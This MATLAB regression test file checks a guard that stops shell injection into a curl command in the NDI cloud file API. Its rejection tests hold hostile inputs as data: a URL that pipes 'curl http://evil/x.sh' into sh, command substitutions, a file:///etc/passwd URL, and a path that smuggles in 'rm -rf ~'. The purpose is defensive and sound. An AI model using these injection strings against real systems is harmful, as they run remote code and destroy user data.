classdef AssertSafeCurlArgsTest < matlab.unittest.TestCase
    % ASSERTSAFECURLARGSTEST - regression tests for the curl shell-injection guard
    %
    % Guards ndi.cloud.api.implementation.files.assertSafeCurlArgs, which GetFile
    % and PutFiles now call before interpolating a server-supplied URL and a
    % local path into a system() curl command.
    %
    % Authored without a local MATLAB runtime; needs MATLAB to validate/run.

    methods (Test)

        function testAcceptsTypicalPresignedURL(testCase)
            % A realistic S3 pre-signed URL (with &, ?, =) is accepted.
            url = "https://ndi-files-prod.s3.amazonaws.com/abc123?" + ...
                "X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Expires=3600&" + ...
                "X-Amz-Signature=deadbeef";
            testCase.verifyWarningFree(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/tmp/dest/abc123"));
        end

        function testAcceptsLocalPathWithSpaces(testCase)
            % The destination path is double-quoted, so spaces are legitimate.
            url = "https://x.s3.amazonaws.com/f";
            testCase.verifyWarningFree(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/Users/My Name/data/f"));
        end

        function testRejectsCommandSubstitutionInURL(testCase)
            url = "https://x/a"" ; curl http://evil/x.sh | sh ; echo """;
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/tmp/f"), ...
                'NDI:CloudApi:UnsafeCurlURL');
        end

        function testRejectsBacktickInURL(testCase)
            url = "https://x/`touch /tmp/pwned`";
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/tmp/f"), ...
                'NDI:CloudApi:UnsafeCurlURL');
        end

        function testRejectsDollarInURL(testCase)
            url = "https://x/$(touch /tmp/pwned)";
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/tmp/f"), ...
                'NDI:CloudApi:UnsafeCurlURL');
        end

        function testRejectsNonHttpsScheme(testCase)
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    "http://x.s3.amazonaws.com/f", "/tmp/f"), ...
                'NDI:CloudApi:UnsafeCurlURL');
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    "file:///etc/passwd", "/tmp/f"), ...
                'NDI:CloudApi:UnsafeCurlURL');
        end

        function testRejectsUnsafeCharsInPath(testCase)
            url = "https://x.s3.amazonaws.com/f";
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/tmp/f"" ; rm -rf ~ ; echo """), ...
                'NDI:CloudApi:UnsafeCurlPath');
            testCase.verifyError(@() ...
                ndi.cloud.api.implementation.files.assertSafeCurlArgs(...
                    url, "/tmp/$(whoami)"), ...
                'NDI:CloudApi:UnsafeCurlPath');
        end

    end

end
